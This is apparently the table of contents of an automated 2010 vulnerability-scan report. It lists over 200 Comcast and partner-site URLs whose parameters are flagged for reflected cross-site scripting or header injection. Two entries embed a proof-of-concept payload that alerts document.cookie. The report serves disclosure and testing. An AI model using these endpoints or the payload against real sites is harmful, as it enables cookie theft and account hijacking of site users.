comcast.com Web Sites, XSS, CWE-79, CWE-113, CAPEC-86

Cross Site Scripting in Comcast Web Properies | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Dec 19 15:35:53 CST 2010.


Loading



1. HTTP header injection

1.1. http://www.destinationurl.com/1ab3/dclk.beacon/beacon1 [REST URL parameter 1]

1.2. http://www.destinationurl.com/1ab3/dclk.beaconreceived/ [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

2.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

2.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

2.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

2.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

2.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

2.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

2.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

2.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

2.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

2.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

2.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

2.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

2.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

2.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]

2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]

2.19. http://digg.com/submit [REST URL parameter 1]

2.20. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 3]

2.21. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 4]

2.22. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 5]

2.23. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 6]

2.24. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 7]

2.25. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 8]

2.26. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 9]

2.27. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 3]

2.28. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 4]

2.29. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 5]

2.30. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 6]

2.31. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 7]

2.32. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 8]

2.33. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 9]

2.34. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 3]

2.35. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 4]

2.36. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 5]

2.37. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 6]

2.38. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 7]

2.39. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 8]

2.40. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 9]

2.41. http://games.comcast.net/product_webgame.php [REST URL parameter 1]

2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]

2.43. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

2.44. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

2.45. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 2]

2.46. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

2.47. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

2.48. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 2]

2.49. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

2.50. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

2.51. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 2]

2.52. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

2.53. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

2.54. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 2]

2.55. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 1]

2.56. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 2]

2.57. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 1]

2.58. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 2]

2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]

2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]

2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]

2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]

2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

2.69. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

2.70. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

2.83. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

2.84. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]

2.86. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.87. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.88. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.89. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.91. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.92. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.93. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.94. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.96. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.97. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.98. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.99. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.100. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.102. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.103. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.104. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.105. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.106. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.108. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.109. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.110. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.111. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.112. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.113. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.114. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.115. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.116. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.117. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.119. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [REST URL parameter 4]

2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]

2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]

2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]

2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]

2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]

2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]

2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]

2.128. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.129. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]

2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]

2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]

2.134. http://www.comcast.net/articles/entertainment-eonline/20101219/b217076/ [REST URL parameter 2]

2.135. http://www.comcast.net/articles/entertainment-movies/20101217/US.People.Randy.Quaid/ [REST URL parameter 2]

2.136. http://www.comcast.net/articles/entertainment/20090708/entertainment.slideshows.001/ [REST URL parameter 2]

2.137. http://www.comcast.net/articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/ [REST URL parameter 2]

2.138. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.139. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.140. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.141. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.142. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.143. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.144. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.145. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.146. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.147. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.148. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.149. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.150. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.151. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.152. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.153. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

2.154. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

2.155. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

2.156. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

2.157. http://www.comcast.net/local/19103/ [REST URL parameter 2]

2.158. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.159. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.160. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.161. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.162. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.163. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.164. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.165. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.166. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.167. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.168. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.169. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.170. http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/ [REST URL parameter 2]

2.171. http://www.comcast.net/slideshow/finance-branddisasters/ [REST URL parameter 2]

2.172. http://www.comcast.net/slideshow/music-greenday [REST URL parameter 2]

2.173. http://www.comcast.net/slideshow/news-spacepictures [REST URL parameter 2]

2.174. http://www.comcast.net/slideshow/sports-bestdressedathletes/ [REST URL parameter 2]

2.175. http://www.comcast.net/weather/19103/ [REST URL parameter 2]

2.176. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a [REST URL parameter 2]

2.177. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ [REST URL parameter 2]

2.178. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 1]

2.179. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 2]

2.180. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 3]

2.181. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 4]

2.182. http://www.comcastsportsnet.com/common/js/aggregate.js [REST URL parameter 3]

2.183. http://www.comcastsportsnet.com/pages/main [REST URL parameter 1]

2.184. http://www.comcastsportsnet.com/pages/main [REST URL parameter 2]

2.185. http://www.csnbaltimore.com/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html [REST URL parameter 5]

2.186. http://www.csnbaltimore.com/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html [REST URL parameter 5]

2.187. http://www.csnbaltimore.com/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html [REST URL parameter 5]

2.188. http://www.csnbaltimore.com/12/12/10/Ravens-Texans-The-basics/landing.html [REST URL parameter 5]

2.189. http://www.csnbaltimore.com/12/16/10/Franklin-finally-heads-to-Vandy/landing.html [REST URL parameter 5]

2.190. http://www.csnbaltimore.com/12/16/10/New-sports-arena-for-Baltimore-/landing.html [REST URL parameter 5]

2.191. http://www.csnbaltimore.com/12/16/10/Will-Ravens-respond-to-Saints/landing.html [REST URL parameter 5]

2.192. http://www.csnbaltimore.com/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html [REST URL parameter 5]

2.193. http://www.csnbaltimore.com/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html [REST URL parameter 5]

2.194. http://www.csnbaltimore.com/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html [REST URL parameter 5]

2.195. http://www.csnbaltimore.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.196. http://www.csnbaltimore.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.197. http://www.csnbaltimore.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.198. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 1]

2.199. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 2]

2.200. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 3]

2.201. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 4]

2.202. http://www.csnbaltimore.com/common/js/aggregate.js [REST URL parameter 3]

2.203. http://www.csnbaltimore.com/favicon.ico [REST URL parameter 1]

2.204. http://www.csnbaltimore.com/pages/landing [REST URL parameter 1]

2.205. http://www.csnbaltimore.com/pages/landing [REST URL parameter 2]

2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]

2.207. http://www.csnbaltimore.com/pages/main [REST URL parameter 1]

2.208. http://www.csnbaltimore.com/pages/main [REST URL parameter 2]

2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]

2.210. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 1]

2.211. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 2]

2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.213. http://www.csnbaltimore.com/pages/video [REST URL parameter 1]

2.214. http://www.csnbaltimore.com/pages/video [REST URL parameter 2]

2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]

2.216. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 1]

2.217. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 2]

2.218. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 3]

2.219. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 4]

2.220. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

2.221. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

